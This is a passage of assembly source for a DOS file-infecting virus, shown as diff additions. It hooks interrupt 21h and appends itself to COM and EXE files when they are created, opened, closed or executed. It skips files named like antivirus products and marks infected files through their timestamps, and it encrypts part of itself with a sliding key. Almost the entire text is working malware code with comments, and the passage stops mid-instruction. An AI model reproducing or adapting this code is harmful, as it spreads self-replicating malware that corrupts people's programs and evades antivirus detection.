+ dw 1391h ; Pointer of jmp_imm32_ + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial IP) + + db 04h ; Four bytes instruction + + mov cs:[bx+01h],ax ; Store initial IP + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial CS ...) + + db 04h ; Four bytes instruction + + mov cs:[bx+03h],ax ; Store initial CS relative to sta... + + db 01h ; One byte instruction + + pop ax ; Load AX from stack (initial SP) + + db 01h ; One byte instruction + + pop ss ; Load SS from stack (initial SS ...) + + db 02h ; Two bytes instruction + + mov sp,ax ; SP = stack pointer + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1391h ; Pointer of jmp_imm32_ + db 11101111b ; End of block +jmp_imm32_ db 11101110b ; Beginning of block + dw 1391h ; Block identification of jmp_imm32_ + db 05h+10h ; Five bytes data + db 11101010b ; JMP imm32 (opcode 0eah) + dd 00h ; Pointer to virus in top of memory + db 11101111b ; End of block +ah__ db 11101110b ; Beginning of block + dw 0bd9h ; Block identification of ah__ + db 01h+10h ; One byte data + db 00h ; Accumulator register (high-orde...) + db 11101111b ; End of block +probability_ db 11101110b ; Beginning of block + dw 0bech ; Block identification of probabil... + db 02h+10h ; Two bytes data + dw 32h ; Probability + db 11101111b ; End of block +crypt_key_ db 11101110b ; Beginning of block + dw 0bd7h ; Block identification of crypt_key_ + db 01h+10h ; One data byte + db 00h ; 8-bit encryption/decryption key + db 11101111b ; End of block +sliding_key_ db 11101110b ; Beginning of block + dw 0bd8h ; Block identification to sliding_... + db 02h+10h ; Two bytes data + dw 00h ; 8-bit sliding encryption/decrypt... + db 11101111b ; End of block +executa_sta db 11101110b ; Beginning of block + dw 1388h ; Block identification of executa_sta + db 01h+10h ; One byte data + db 00h ; Executable status + db 11101111b ; End of block +origin_code_ db 11101110b ; Beginning of block + dw 1f40h ; Block identification of origin_c... + db 03h+10h ; Three bytes data + db 11000011b,02h dup(00h) + db 11101111b ; End of block +incorr_code_ db 11101110b ; Beginning of block + dw 1776h ; Block identification of incorr_c... + db 03h+10h ; Three bytes data + db 11000011b,02h dup(00h) + db 11101111b ; End of block +initial_cs_ db 11101110b ; Beginning of block + dw 1389h ; Block identification of initial_cs_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial CS relative to start of ... + db 11101111b ; End of block +initial_ss_ db 11101110b ; Beginning of block + dw 138ah ; Block identification of initial_ss_ + db 02h+10h ; Two bytes data + dw 0fff0h ; Initial SS relative to start of ... + db 11101111b ; End of block +initial_ip_ db 11101110b ; Beginning of block + dw 138bh ; Block identification of initial_ip_ + db 02h+10h ; Two bytes data + dw 100h ; Initial IP + db 11101111b ; End of block +incorrec_ip db 11101110b ; Beginning of block + dw 1773h ; Block identification of incorrec_ip + db 02h+10h ; Two bytes data + dw 100h ; Incorrect IP + db 11101111b ; End of block +initial_sp_ db 11101110b ; Beginning of block + dw 138ch ; Block identification of initial_sp_ + db 02h+10h ; Two bytes data + dw 0fffeh ; Initial SP + db 11101111b ; End of block +new_mcb_siz db 11101110b ; Beginning of block + dw 1393h ; Block identification of new_mcb_siz + db 02h+10h ; Two bytes data + dw 1000h ; New size in paragraphs + db 11101111b ; End of block +mcb_size__ db 11101110b ; Beginning of block + dw 1395h ; Block identification of mcb_size__ + db 02h+10h ; Two bytes data + dw 0ffffh ; Size of memory block in paragraphs + db 11101111b ; End of block +mcb_size___ db 11101110b ; Beginning of block + dw 1394h ; Block identification of mcb_size___ + db 02h+10h ; Two bytes data + dw 00h ; Size of memory block in paragraphs + db 11101111b ; End of block +program_seg_ db 11101110b ; Beginning of block + dw 0befh ; Block identification of program_... + db 02h+10h ; Two bytes data + dw 00h ; Segment of PSP for current process + db 11101111b ; End of block +virus_lengt db 11101110b ; Beginning of block + dw 0bf0h ; Block identification of virus_lengt + db 02h+10h ; Two bytes data + dw 00h ; Length of virus + db 11101111b ; End of block +vir_exit_of db 11101110b ; Beginning of block + dw 0bf1h ; Block identification of vir_exit_of + db 02h+10h ; Two bytes data + dw 00h ; Offset of virus_exit_ + db 11101111b ; End of block +tmc_table_ db 11101110b ; Beginning of block + dw 4c5h ; Block identification of tmc_table_ + db 11101111b ; End of block + db 00h ; End of table +second_table db 11101111b ; End of block +virus_end: +crypt_table db 11101110b ; Beginning of block + dw 66h ; Block identification of crypt_table + db 02h ; Two bytes instruction + + xor bp,bp ; Zero BP + + db 02h ; Two bytes instruction + + mov ds,bp ; DS = segment of BIOS data segment + + db 04h ; Four bytes instruction + + mov bx,ds:[46dh] ; BX = timer ticks since midnight + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + and bx,1111111111110000b + + db 04h ; Four bytes instruction + + mov ds:[1234h],bx ; Store timer ticks since midnight + + db 11101101b ; Data reference + dw 13adh ; Pointer to timer_ticks + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd4h ; Pointer to get_rnd_num_ + db 03h ; Three bytes instruction + + mov ds:[1234h],al ; Store 8-bit encryption/decryptio... + + db 11101101b ; Data reference + dw 0bd7h ; Pointer to crypt_key_ + db 04h ; Four bytes instruction + + mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... + + db 11101101b ; Data reference + dw 0bd8h ; Pointer to sliding_key_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bfeh ; Pointer to crypt_table_ + db 03h ; Three bytes instruction + + mov ax,3521h ; Get interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of int21_addr + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 02h ; Two bytes instruction + + mov [di],bx ; Store offset of interrupt 21h + + db 03h ; Three bytes instruction + + mov [di+02h],es ; Store segment of interrupt 21h + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of int21_virus + + db 11101101b ; Data reference + dw 0c8h ; Pointer to int21_virus + db 03h ; Three bytes instruction + + mov ax,2521h ; Set interrupt vector 21h + + db 02h ; Two bytes instruction + + int 21h + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 65h ; Pointer to virus_exit_ + db 11101111b ; End of block +crypt_table_ db 11101110b ; Beginning of block + dw 0bfeh ; Block identification of crypt_ta... + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of tmc_table_ + + db 11101101b ; Data reference + dw 4c5h ; Pointer to tmc_table_ + db 03h ; Three bytes instruction + + mov cx,(code_end-first_table) + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0bffh ; Pointer to crypt_loop + db 11101111b ; End of block +crypt_loop db 11101110b ; Beginning of block + dw 0bffh ; Block identification of crypt_loop + db 02h ; Two bytes instruction + + xor [si],al ; Encrypt byte of table + + db 01h ; One byte instruction + + inc si ; Increase offset within table + + db 02h ; Two bytes instruction + + add al,ah ; Add 8-bit sliding encryption key... + + db 01h ; One byte instruction + + dec cx ; Decrease counter + + db 01110101b+10000000b ; Not zero? Jump to crypt_loop + dw 0bffh ; Pointer to crypt_loop + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +int21_virus db 11101110b ; Beginning of block + dw 0c8h ; Block identification of int21_virus + db 01h ; One byte instruction + + cld ; Clear direction flag + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a0h ; Pointer to push_regs + db 03h ; Three bytes instruction + + cmp ah,3ch ; Create file? + + db 01110100b+10000000b ; Equal? Jump to exam_drv_let + dw 139ah ; Pointer to exam_drv_let + db 03h ; Three bytes instruction + + cmp ah,3dh ; Open file? + + db 01110100b+10000000b ; Equal? Jump to exam_drv_let + dw 139ah ; Pointer to exam_drv_let + db 03h ; Three bytes instruction + + cmp ah,3eh ; Close file? + + db 01110100b+10000000b ; Equal? Jump to infect_fil + dw 139ch ; Pointer to infect_fil + db 03h ; Three bytes instruction + + cmp ah,4bh ; Load and/or execute program? + + db 01110101b+10000000b ; Not equal? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a9h ; Pointer to infect_file + db 11101111b ; End of block +infect_file db 11101110b ; Beginning of block + dw 13a9h ; Block identification of infect_file + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 1392h ; Pointer to infect_fil_ + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a6h ; Pointer to int21_exit + db 11101111b ; End of block +int21_exit db 11101110b ; Beginning of block + dw 13a6h ; Block identification of int21_exit + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 05h ; Five bytes instruction + + jmp dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 11101111b ; End of block +exam_drv_let db 11101110b ; Beginning of block + dw 139ah ; Block identification of exam_drv... + db 02h ; Two bytes instruction + + mov si,dx ; SI = offset of filename + + db 01h ; One byte instruction + + lodsb ; AL = first byte of filename + + db 03h ; Three bytes instruction + + cmp byte ptr [si],':' ; Does filename include drive letter? + + db 01110101b+10000000b ; Not equal? Jump to exam_def_drv + dw 139bh ; Pointer to exam_def_drv + db 02h ; Two bytes instruction + + or al,20h ; Lowercase character + + db 02h ; Two bytes instruction + + cmp al,'b' ; Floppy disk? + + db 01110111b+10000000b ; Above? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a8h ; Pointer to infect_file_ + db 11101111b ; End of block +exam_def_drv db 11101110b ; Beginning of block + dw 139bh ; Block identification of exam_def... + db 01h ; One byte instruction + + push ax ; Save AX at stack + + db 02h ; Two bytes instruction + + mov ah,19h ; Get current default drive + + db 02h ; Two bytes instruction + + int 21h + + db 02h ; Two bytes instruction + + cmp al,01h ; Floppy disk? + + db 01h ; One byte instruction + + pop ax ; Load AX from stack + + db 01110111b+10000000b ; Above? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13a8h ; Pointer to infect_file_ + db 11101111b ; End of block +infect_file_ db 11101110b ; Beginning of block + dw 13a8h ; Block identification of infect_f... + db 03h ; Three bytes instruction + + cmp ah,3ch ; Create file? + + db 01110101b+10000000b ; Not equal? Jump to infect_file + dw 13a9h ; Pointer to infect_file + db 02h ; Two bytes instruction + + xor bx,bx ; Zero file handle + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13abh ; Pointer to exam_psp_etc + db 01110101b+10000000b ; Not zero? Jump to int21_exit + dw 13a6h ; Pointer to int21_exit + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a4h ; Pointer to int24_store + db 02h ; Two bytes instruction + + mov ah,60h ; Canonicalize filename or path + + db 01h ; One byte instruction + + dec si ; SI = offset of filename + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (CS) + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of filename + + db 11101101b ; Data reference + dw 139eh ; Pointer to filename + db 02h ; Two bytes instruction + + int 21h + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 05h ; Five bytes instruction + + call dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a0h ; Pointer to push_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 03h ; Three bytes instruction + + mov bx,1111111111111111b + + db 03h ; Three bytes instruction + + adc bx,00h ; BX = file handle mask + + db 02h ; Two bytes instruction + + and ax,bx ; AX = file handle + + db 04h ; Four bytes instruction + + mov cs:[1234h],ax ; Store file handle + + db 11101101b ; Data reference + dw 139dh ; Pointer to file_handle + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a5h ; Pointer to int24_load + db 01h ; One byte instruction + + popf ; Load flags from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + sti ; Set interrupt-enable flag + + db 03h ; Three bytes instruction + + retf 02h ; Return far and ??? + + db 11101111b ; End of block +infect_fil db 11101110b ; Beginning of block + dw 139ch ; Block identification of infect_fil + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13abh ; Pointer to exam_psp_etc + db 01110010b+10000000b ; Store segment of PSP for current... + dw 13a6h ; Pointer to int21_exit + db 02h ; Two bytes instruction + + xor ax,ax ; Zero file handle + + db 04h ; Four bytes instruction + + mov cs:[1234h],ax ; Store file handle + + db 11101101b ; Data reference + dw 139dh ; Pointer to file_handle + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 05h ; Five bytes instruction + + call dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a0h ; Pointer to push_regs + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of filename + + db 11101101b ; Data reference + dw 139eh ; Pointer to filename + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 1392h ; Pointer to infect_fil_ + db 01h ; One byte instruction + + popf ; Load flags from stack + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a1h ; Pointer to pop_regs + db 01h ; One byte instruction + + sti ; Set interrupt-enable flag + + db 03h ; Three bytes instruction + + retf 02h ; Return far and ??? + + db 11101111b ; End of block +exam_psp_etc db 11101110b ; Beginning of block + dw 13abh ; Block identification of exam_psp... + db 01h ; One byte instruction + + push bx ; Save BX at stack + + db 02h ; Two bytes instruction + + mov ah,62h ; Get current PSP address + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of progra_seg + + db 11101101b ; Data reference + dw 139fh ; Pointer to progra_seg + db 03h ; Three bytes instruction + + cmp cs:[di],bx ; Segment of PSP for current proc...? + + db 03h ; Three bytes instruction + + mov cs:[di],bx ; Store segment of PSP for current... + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of file_handle + + db 11101101b ; Data reference + dw 139dh ; Pointer to file_handle + db 01110101b+10000000b ; Not equal? Jump to dont_infect + dw 13ach ; Pointer to dont_infect + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 02h ; Two bytes instruction + + mov ax,bx ; AX = file handle + + db 03h ; Three bytes instruction + + sub ax,cs:[di] ; Subtract saved file handle from ... + + db 03h ; Three bytes instruction + + add ax,0ffffh ; Add sixty-five thousand five hun... + + db 01h ; One byte instruction + + inc ax ; Increase file handle + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +dont_infect db 11101110b ; Beginning of block + dw 13ach ; Block identification of dont_infect + db 05h ; Five bytes instruction + + mov word ptr cs:[di],00h + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero file handle + + db 01h ; One byte instruction + + pop bx ; Load BX from stack + + db 01h ; One byte instruction + + stc ; Set carry flag + + db 01h ; One byte instruction + + ret ; Return + + db 11101111b ; End of block +infect_fil_ db 11101110b ; Beginning of block + dw 1392h ; Block identification of infect_fil_ + db 01h ; One byte instruction + + push ds ; Save DS at stack + + db 01h ; One byte instruction + + pop es ; Load ES from stack (DS) + + db 02h ; Two bytes instruction + + mov di,dx ; DI = offset of filename + + db 03h ; Three bytes instruction + + mov cx,43h ; CX = number of bytes to search t... + + db 02h ; Two bytes instruction + + xor al,al ; Zero AL + + db 02h ; Two bytes instruction + + repne scasb ; Find end of filename + + db 01110101b+10000000b ; Not equal? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + lea si,[di-05h] ; SI = offset of the dot in the fi... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + mov bx,'mo' ; COM executable + + db 03h ; Three bytes instruction + + cmp ax,'c.' ; COM executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 03h ; Three bytes instruction + + mov bx,'ex' ; EXE executable + + db 03h ; Three bytes instruction + + cmp ax,'e.' ; EXE executable? + + db 01110100b+10000000b ; Equal? Jump to examine_ext + dw 0f0h ; Pointer to examine_ext + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 0fbh ; Pointer to infect_exit_ + db 11101111b ; End of block +examine_ext db 11101110b ; Beginning of block + dw 0f0h ; Block identification of examine_ext + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 02h ; Two bytes instruction + + cmp ax,bx ; COM or EXE executable? + + db 01110101b+10000000b ; Not equal? Jump to examine_ext + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + sub si,04h ; SI = offset of the dot in the fi... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1398h ; Pointer to find_name + db 11101111b ; End of block +find_name db 11101110b ; Beginning of block + dw 1398h ; Block identification of find_name + db 01h ; One byte instruction + + dec si ; SI = offset within filename + + db 02h ; Two bytes instruction + + mov al,[si] ; AL = byte of filename + + db 02h ; Two bytes instruction + + cmp al,'/' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp al,'\' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp al,':' ; Beginning of filename? + + db 01110100b+10000000b ; Equal? Jump to examine_name + dw 1397h ; Pointer to examine_name + db 02h ; Two bytes instruction + + cmp si,dx ; Beginning of filename? + + db 01110111b+10000000b ; Above? Jump to find_name + dw 1398h ; Pointer to find_name + db 01h ; One byte instruction + + dec si ; SI = offset within filename + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 1397h ; Pointer to examine_name + db 11101111b ; End of block +examine_name db 11101110b ; Beginning of block + dw 1397h ; Block identification of examine_... + db 01h ; One byte instruction + + inc si ; SI = offset of beginning of file... + + db 01h ; One byte instruction + + lodsw ; AX = two bytes of filename + + db 03h ; Three bytes instruction + + or ax,2020h ; Lowercase characters + + db 03h ; Three bytes instruction + + xor ax,0aa55h ; Encrypt two bytes of filename + + db 03h ; Three bytes instruction + + cmp ax,('ci' xor 0aa55h) + + db 01110100b+10000000b ; Equal? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('on' xor 0aa55h) + + db 01110100b+10000000b ; NOD-iCE? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('ew' xor 0aa55h) + + db 01110100b+10000000b ; Dr. Web? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('bt' xor 0aa55h) + + db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ... + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('va' xor 0aa55h) + + db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i... + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('-f' xor 0aa55h) + + db 01110100b+10000000b ; F-PROT? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('cs' xor 0aa55h) + + db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_... + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('lc' xor 0aa55h) + + db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_... + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('oc' xor 0aa55h) + + db 01110100b+10000000b ; COMMAND.COM? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('iw' xor 0aa55h) + + db 01110100b+10000000b ; WIN.COM? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 03h ; Three bytes instruction + + cmp ax,('rk' xor 0aa55h) + + db 01110100b+10000000b ; Equal? Jump to infect_exit_ + dw 0fbh ; Pointer to infect_exit_ + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 13a4h ; Pointer to int24_store + db 03h ; Three bytes instruction + + mov ax,3d02h ; Open file (read/write) + + db 01h ; One byte instruction + + pushf ; Save flags at stack + + db 05h ; Five bytes instruction + + call dword ptr cs:[1234h] + + db 11101101b ; Data reference + dw 0c9h ; Pointer to int21_addr + db 01110010b+10000000b ; Error? Jump to terminate_ + dw 1771h ; Pointer to infect_exit + db 02h ; Two bytes instruction + + mov bx,ax ; BX = file handle + + db 02h ; Two bytes instruction + + xor ax,ax ; Zero AX + + db 02h ; Two bytes instruction + + mov ds,ax ; DS = segment of BIOS data segment + + db 04h ; Four bytes instruction + + mov si,ds:[46dh] ; SI = timer ticks since midnight + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + push cs ; Save CS at stack + + db 01h ; One byte instruction + + pop ds ; Load DS from stack (CS) + + db 01h ; One byte instruction + + pop es ; Load ES from stack (CS) + + db 03h ; Three bytes instruction + + mov ax,5700h ; Get file's date and time + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 04h ; Four bytes instruction + + mov ds:[1234h],dx ; Store file's date + + db 11101101b ; Data reference + dw 12dh ; Pointer to file_date + db 02h ; Two bytes instruction + + mov al,cl ; AL = low-order byte of file time + + db 02h ; Two bytes instruction + + and al,00011111b ; AL = file seconds + + db 02h ; Two bytes instruction + + cmp al,00000100b ; Already infected (8 seconds)? + + db 01110100b+10000000b ; Equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + and cl,11100000b ; Zero file seconds + + db 03h ; Three bytes instruction + + or cl,00000100b ; Set infection mark (8 seconds) + + db 04h ; Four bytes instruction + + mov ds:[1234h],cx ; Store file's time + + db 11101101b ; Data reference + dw 12ch ; Pointer to file_time + db 03h ; Three bytes instruction + + and si,1111111111110000b + + db 04h ; Four bytes instruction + + cmp ds:[1234h],si ; Infect file? + + db 11101101b ; Data reference + dw 13adh ; Pointer to timer_ticks + db 01110100b+10000000b ; Equal? Jump to close_file + dw 0fah ; Pointer to close_file + db 04h ; Four bytes instruction + + mov ds:[1234h],si ; Store timer ticks since midnight + + db 11101101b ; Data reference + dw 13adh ; Pointer to timer_ticks + db 02h ; Two bytes instruction + + mov ah,3fh ; Read from file + + db 03h ; Three bytes instruction + + mov cx,18h ; Read twenty-four bytes + + db 03h ; Three bytes instruction + + mov dx,1234h ; DX = offset of exe_header + + db 11101101b ; Data reference + dw 138fh ; Pointer to exe_header + db 02h ; Two bytes instruction + + mov si,dx ; SI = offset of exe_header + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + mov ax,4202h ; Set current file position (EOF) + + db 01h ; One byte instruction + + cwd ; DX = high-order word of offset f... + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 06h ; Six bytes instruction + + mov ds:[00h],0010111010001101b + + + db 04h ; Four bytes instruction + + cmp [si],'ZM' ; EXE signature? + + db 01110100b+10000000b ; Equal? Jump to infect_exe + dw 138dh ; Pointer to infect_exe + db 04h ; Four bytes instruction + + cmp [si],'MZ' ; EXE signature? + + db 01110100b+10000000b ; Equal? Jump to infect_exe + dw 138dh ; Pointer to infect_exe + db 04h ; Four bytes instruction + + mov ds:[1234h],cl ; Store executable status + + db 11101101b ; Data reference + dw 1388h ; Pointer to executa_sta + db 03h ; Three bytes instruction + + cmp ax,0bb8h ; Too small in filesize? + + db 01110010b+10000000b ; Below? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + cmp ax,0dea8h ; Too large in filesize? + + db 01110111b+10000000b ; Above? Jump to close_file + dw 0fah ; Pointer to close_file + db 01h ; One byte instruction + + push si ; Save SI at stack + + db 03h ; Three bytes instruction + + mov di,1234h ; DI = offset of exe_header + + db 11101101b ; Data reference + dw 138fh ; Pointer to exe_header + db 02h ; Two bytes instruction + + mov cl,[di] ; CL = first byte of original code... + + db 03h ; Three bytes instruction + + mov byte ptr [di],11101001b + + db 01h ; One byte instruction + + inc di ; DI = offset within exe_header + + db 04h ; Four bytes instruction + + mov ds:[1234h],cl ; Store first byte of original cod... + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 04h ; Four bytes instruction + + mov ds:[1234h],cl ; Store first byte of original cod... + + db 11101101b ; Data reference + dw 1776h ; Pointer to incorr_code_ + db 02h ; Two bytes instruction + + mov cx,[di] ; CX = word of original code of in... + + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of origin_code_ + + db 11101101b ; Data reference + dw 1f40h ; Pointer to origin_code_ + db 03h ; Three bytes instruction + + mov [si+01h],cx ; Store word of original code of i... + + db 03h ; Three bytes instruction + + sub ax,03h ; AX = offset of virus within infe... + + db 01h ; One byte instruction + + stosw ; Store offset of virus within inf... + + db 03h ; Three bytes instruction + + mov ax,14h ; AX = probability of storing inco... + + db 04h ; Four bytes instruction + + cmp ds:[1234h],ax ; Store incorrect IP? + + db 11101101b ; Data reference + dw 0bech ; Pointer to probability_ + db 01110111b+10000000b ; Above? Jump to write_virus + dw 13afh ; Pointer to dont_corrupt + db 03h ; Three bytes instruction + + mov bp,10h ; Random number within sixteen + + db 11101000b ; CALL imm16 (opcode 0e8h) + dw 0bd5h ; Pointer to rnd_in_rang + db 03h ; Three bytes instruction + + sub ax,08h ; Subtract eight from random number + + db 02h ; Two bytes instruction + + add cx,ax ; Add random number to word of ori... + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 13afh ; Pointer to dont_corrupt + db 11101111b ; End of block +dont_corrupt db 11101110b ; Beginning of block + dw 13afh ; Block identification of dont_cor... + db 03h ; Three bytes instruction + + mov si,1234h ; SI = offset of incorr_code_ + + db 11101101b ; Data reference + dw 1776h ; Pointer to incorr_code_ + db 03h ; Three bytes instruction + + mov [si+01h],cx ; Store word of original code of i... + + db 01h ; One byte instruction + + pop si ; Load SI from stack + + db 03h ; Three bytes instruction + + mov ax,0fff0h ; AX = initial CS and SS relative ... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial CS relative to sta... + + db 11101101b ; Data reference + dw 1389h ; Pointer to initial_cs_ + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SS relative to sta... + + db 11101101b ; Data reference + dw 138ah ; Pointer to initial_ss_ + db 03h ; Three bytes instruction + + mov ax,100h ; AX = initial IP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial IP + + db 11101101b ; Data reference + dw 138bh ; Pointer to initial IP + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial IP + + db 11101101b ; Data reference + dw 1773h ; Pointer to incorrec_ip + db 03h ; Three bytes instruction + + mov ax,0fffeh ; AX = initial SP + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store initial SP + + db 11101101b ; Data reference + dw 138ch ; Pointer to initial_sp_ + db 01h ; One byte instruction + + inc ax ; Increase size of memory block in... + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store size of memory block in pa... + + db 11101101b ; Data reference + dw 1395h ; Pointer to mcb_size__ + db 03h ; Three bytes instruction + + mov ax,1000h ; AX = new size in paragraphs + + db 03h ; Three bytes instruction + + mov ds:[1234h],ax ; Store new size in paragraphs + + db 11101101b ; Data reference + dw 1393h ; Pointer to new_mcb_siz + db 03h ; Three bytes instruction + + mov ax,4202h ; Set current file position (EOF) + + db 01h ; One byte instruction + + cwd ; DX = low-order word of offset f... + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 03h ; Three bytes instruction + + add ax,100h ; AX = delta offset + + db 11101001b ; JMP imm16 (opcode 0e9h) + dw 138eh ; Pointer to write_virus + db 11101111b ; End of block +write_virus db 11101110b ; Beginning of block + dw 138eh ; Block identification of write_virus + db 03h ; Three bytes instruction + + mov ds:[02h],ax ; Store delta offset + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 01h ; Two bytes instruction + + cwd ; Zero DX + + db 03h ; Three bytes instruction + + mov cx,1234h ; CX = length of virus + + db 11101101b ; Data reference + dw 66h ; Pointer to virus_end + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; Three bytes instruction + + mov ax,4200h ; Set current file position (SOF) + + db 01h ; One byte instruction + + cwd ; DX = low-order word of offset f... + + db 02h ; Two bytes instruction + + xor cx,cx ; CX = high-order word of offset f... + + db 02h ; Two bytes instruction + + int 21h + + db 02h ; Two bytes instruction + + mov ah,40h ; Write to file + + db 02h ; Two bytes instruction + + mov dx,si ; DX = offset of exe_header + + db 03h ; Three bytes instruction + + mov cx,18h ; Write twenty-four bytes + + db 02h ; Two bytes instruction + + int 21h + + db 01110010b+10000000b ; Error? Jump to close_file + dw 0fah ; Pointer to close_file + db 03h ; 